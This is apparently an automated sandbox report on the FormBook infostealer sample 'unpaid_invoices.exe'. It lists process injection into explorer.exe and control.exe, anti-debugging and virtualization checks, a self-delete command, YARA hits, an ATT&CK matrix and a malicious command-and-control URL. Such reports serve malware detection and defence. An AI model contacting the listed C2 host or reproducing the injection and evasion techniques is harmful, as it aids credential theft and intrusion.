          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCAD30 mov eax, dword ptr fs:[00000030h]17_2_04BCAD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE4120 mov eax, dword ptr fs:[00000030h]17_2_04BE4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE4120 mov eax, dword ptr fs:[00000030h]17_2_04BE4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE4120 mov eax, dword ptr fs:[00000030h]17_2_04BE4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE4120 mov eax, dword ptr fs:[00000030h]17_2_04BE4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE4120 mov ecx, dword ptr fs:[00000030h]17_2_04BE4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC9100 mov eax, dword ptr fs:[00000030h]17_2_04BC9100
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC9100 mov eax, dword ptr fs:[00000030h]17_2_04BC9100
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC9100 mov eax, dword ptr fs:[00000030h]17_2_04BC9100
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BEC577 mov eax, dword ptr fs:[00000030h]17_2_04BEC577
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BEC577 mov eax, dword ptr fs:[00000030h]17_2_04BEC577
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCB171 mov eax, dword ptr fs:[00000030h]17_2_04BCB171
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCB171 mov eax, dword ptr fs:[00000030h]17_2_04BCB171
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE7D50 mov eax, dword ptr fs:[00000030h]17_2_04BE7D50
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C4A537 mov eax, dword ptr fs:[00000030h]17_2_04C4A537
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BEB944 mov eax, dword ptr fs:[00000030h]17_2_04BEB944
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BEB944 mov eax, dword ptr fs:[00000030h]17_2_04BEB944
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C98D34 mov eax, dword ptr fs:[00000030h]17_2_04C98D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C7FEC0 mov eax, dword ptr fs:[00000030h]17_2_04C7FEC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C08EC7 mov eax, dword ptr fs:[00000030h]17_2_04C08EC7
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BDAAB0 mov eax, dword ptr fs:[00000030h]17_2_04BDAAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BDAAB0 mov eax, dword ptr fs:[00000030h]17_2_04BDAAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFFAB0 mov eax, dword ptr fs:[00000030h]17_2_04BFFAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC52A5 mov eax, dword ptr fs:[00000030h]17_2_04BC52A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC52A5 mov eax, dword ptr fs:[00000030h]17_2_04BC52A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC52A5 mov eax, dword ptr fs:[00000030h]17_2_04BC52A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC52A5 mov eax, dword ptr fs:[00000030h]17_2_04BC52A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC52A5 mov eax, dword ptr fs:[00000030h]17_2_04BC52A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C98ED6 mov eax, dword ptr fs:[00000030h]17_2_04C98ED6
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFD294 mov eax, dword ptr fs:[00000030h]17_2_04BFD294
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFD294 mov eax, dword ptr fs:[00000030h]17_2_04BFD294
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5FE87 mov eax, dword ptr fs:[00000030h]17_2_04C5FE87
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BF16E0 mov ecx, dword ptr fs:[00000030h]17_2_04BF16E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD76E2 mov eax, dword ptr fs:[00000030h]17_2_04BD76E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C446A7 mov eax, dword ptr fs:[00000030h]17_2_04C446A7
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C90EA5 mov eax, dword ptr fs:[00000030h]17_2_04C90EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C90EA5 mov eax, dword ptr fs:[00000030h]17_2_04C90EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C90EA5 mov eax, dword ptr fs:[00000030h]17_2_04C90EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BF36CC mov eax, dword ptr fs:[00000030h]17_2_04BF36CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCE620 mov eax, dword ptr fs:[00000030h]17_2_04BCE620
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE3A1C mov eax, dword ptr fs:[00000030h]17_2_04BE3A1C
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C7B260 mov eax, dword ptr fs:[00000030h]17_2_04C7B260
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C7B260 mov eax, dword ptr fs:[00000030h]17_2_04C7B260
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C98A62 mov eax, dword ptr fs:[00000030h]17_2_04C98A62
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C0927A mov eax, dword ptr fs:[00000030h]17_2_04C0927A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCC600 mov eax, dword ptr fs:[00000030h]17_2_04BCC600
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCC600 mov eax, dword ptr fs:[00000030h]17_2_04BCC600
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCC600 mov eax, dword ptr fs:[00000030h]17_2_04BCC600
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BEAE73 mov eax, dword ptr fs:[00000030h]17_2_04BEAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BEAE73 mov eax, dword ptr fs:[00000030h]17_2_04BEAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BEAE73 mov eax, dword ptr fs:[00000030h]17_2_04BEAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BEAE73 mov eax, dword ptr fs:[00000030h]17_2_04BEAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BEAE73 mov eax, dword ptr fs:[00000030h]17_2_04BEAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD766D mov eax, dword ptr fs:[00000030h]17_2_04BD766D
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C7FE3F mov eax, dword ptr fs:[00000030h]17_2_04C7FE3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC9240 mov eax, dword ptr fs:[00000030h]17_2_04BC9240
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC9240 mov eax, dword ptr fs:[00000030h]17_2_04BC9240
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC9240 mov eax, dword ptr fs:[00000030h]17_2_04BC9240
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC9240 mov eax, dword ptr fs:[00000030h]17_2_04BC9240
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD7E41 mov eax, dword ptr fs:[00000030h]17_2_04BD7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD7E41 mov eax, dword ptr fs:[00000030h]17_2_04BD7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD7E41 mov eax, dword ptr fs:[00000030h]17_2_04BD7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD7E41 mov eax, dword ptr fs:[00000030h]17_2_04BD7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD7E41 mov eax, dword ptr fs:[00000030h]17_2_04BD7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD7E41 mov eax, dword ptr fs:[00000030h]17_2_04BD7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFB390 mov eax, dword ptr fs:[00000030h]17_2_04BFB390
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD1B8F mov eax, dword ptr fs:[00000030h]17_2_04BD1B8F
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD1B8F mov eax, dword ptr fs:[00000030h]17_2_04BD1B8F
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C8138A mov eax, dword ptr fs:[00000030h]17_2_04C8138A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C7D380 mov ecx, dword ptr fs:[00000030h]17_2_04C7D380
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C47794 mov eax, dword ptr fs:[00000030h]17_2_04C47794
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C47794 mov eax, dword ptr fs:[00000030h]17_2_04C47794
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C47794 mov eax, dword ptr fs:[00000030h]17_2_04C47794
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C95BA5 mov eax, dword ptr fs:[00000030h]17_2_04C95BA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFE730 mov eax, dword ptr fs:[00000030h]17_2_04BFE730
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C98B58 mov eax, dword ptr fs:[00000030h]17_2_04C98B58
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC4F2E mov eax, dword ptr fs:[00000030h]17_2_04BC4F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC4F2E mov eax, dword ptr fs:[00000030h]17_2_04BC4F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C98F6A mov eax, dword ptr fs:[00000030h]17_2_04C98F6A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C9070D mov eax, dword ptr fs:[00000030h]17_2_04C9070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C9070D mov eax, dword ptr fs:[00000030h]17_2_04C9070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BF3B7A mov eax, dword ptr fs:[00000030h]17_2_04BF3B7A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BF3B7A mov eax, dword ptr fs:[00000030h]17_2_04BF3B7A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C8131B mov eax, dword ptr fs:[00000030h]17_2_04C8131B
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5FF10 mov eax, dword ptr fs:[00000030h]17_2_04C5FF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5FF10 mov eax, dword ptr fs:[00000030h]17_2_04C5FF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCDB60 mov ecx, dword ptr fs:[00000030h]17_2_04BCDB60
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BDFF60 mov eax, dword ptr fs:[00000030h]17_2_04BDFF60
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCF358 mov eax, dword ptr fs:[00000030h]17_2_04BCF358
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCDB40 mov eax, dword ptr fs:[00000030h]17_2_04BCDB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BDEF40 mov eax, dword ptr fs:[00000030h]17_2_04BDEF40
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0040A130 LdrLoadDll,2_2_0040A130
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E143DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00E143DC
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E143AB SetUnhandledExceptionFilter,1_2_00E143AB
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00E143DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00E143DC
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00E143AB SetUnhandledExceptionFilter,2_2_00E143AB

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeThread register set: target process: 3616Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3616Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3080Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeProcess created: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslqJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\ronkhfyq.exe"Jump to behavior
          Source: explorer.exe, 00000005.00000000.348518528.0000000005E60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265421157.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.286646709.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.265421157.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.280419842.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.280644910.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.265421157.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.280644910.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342562960.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
          Source: explorer.exe, 00000005.00000000.265421157.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.280644910.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342562960.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000001B.00000000.470520461.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.458823755.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.483237143.0000000000A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanUse
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E13293 cpuid 1_2_00E13293
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E13ED8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00E13ED8
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: explorer.exe, 0000001B.00000003.441618102.0000000009AAD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.467442285.0000000009AB4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.442818303.0000000009AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter          		Path Interception1
          Access Token Manipulation          		1
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API          		Boot or Logon Initialization Scripts312
          Process Injection          		2
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Query Registry          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over Bluetooth1
          Application Layer Protocol          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Access Token Manipulation          		Security Account Manager271
          Security Software Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)312
          Process Injection          		NTDS2
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets2
          Process Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync114
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 626537 Sample: unpaid_invoices.exe Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 45 5 other signatures 2->45 11 unpaid_invoices.exe 19 2->11         started        process3 file4 31 C:\Users\user\AppData\Local\...\ronkhfyq.exe, PE32 11->31 dropped 14 ronkhfyq.exe 11->14         started        process5 signatures6 53 Multi AV Scanner detection for dropped file 14->53 55 Tries to detect virtualization through RDTSC time measurements 14->55 17 ronkhfyq.exe 14->17         started        process7 signatures8 33 Modifies the context of a thread in another process (thread injection) 17->33 35 Maps a DLL or memory area into another process 17->35 37 Queues an APC in another process (thread injection) 17->37 20 explorer.exe 17->20 injected process9 process10 22 control.exe 20->22         started        signatures11 47 Modifies the context of a thread in another process (thread injection) 22->47 49 Maps a DLL or memory area into another process 22->49 51 Tries to detect virtualization through RDTSC time measurements 22->51 25 cmd.exe 1 22->25         started        27 explorer.exe 2 154 22->27         started        process12 process13 29 conhost.exe 25->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          unpaid_invoices.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\ronkhfyq.exe35%VirustotalBrowse

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.ronkhfyq.exe.d80000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.ronkhfyq.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.ronkhfyq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.ronkhfyq.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.ronkhfyq.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://crl.m0%URL Reputationsafe
          www.beamaster.info/p0ip/1%VirustotalBrowse
          www.beamaster.info/p0ip/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.beamaster.info/p0ip/true
          • 1%, Virustotal, Browse
          • Avira URL Cloud: malware
          		low

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://crl.mexplorer.exe, 0000001B.00000003.441376750.0000000009BD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.442769912.0000000009BD0000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://nsis.sf.net/NSIS_ErrorErrorunpaid_invoices.exefalse
            		high

            World Map of Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:626537
            Start date and time: 14/05/202211:30:182022-05-14 11:30:18 +02:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 17s
            Hypervisor based Inspection enabled:false
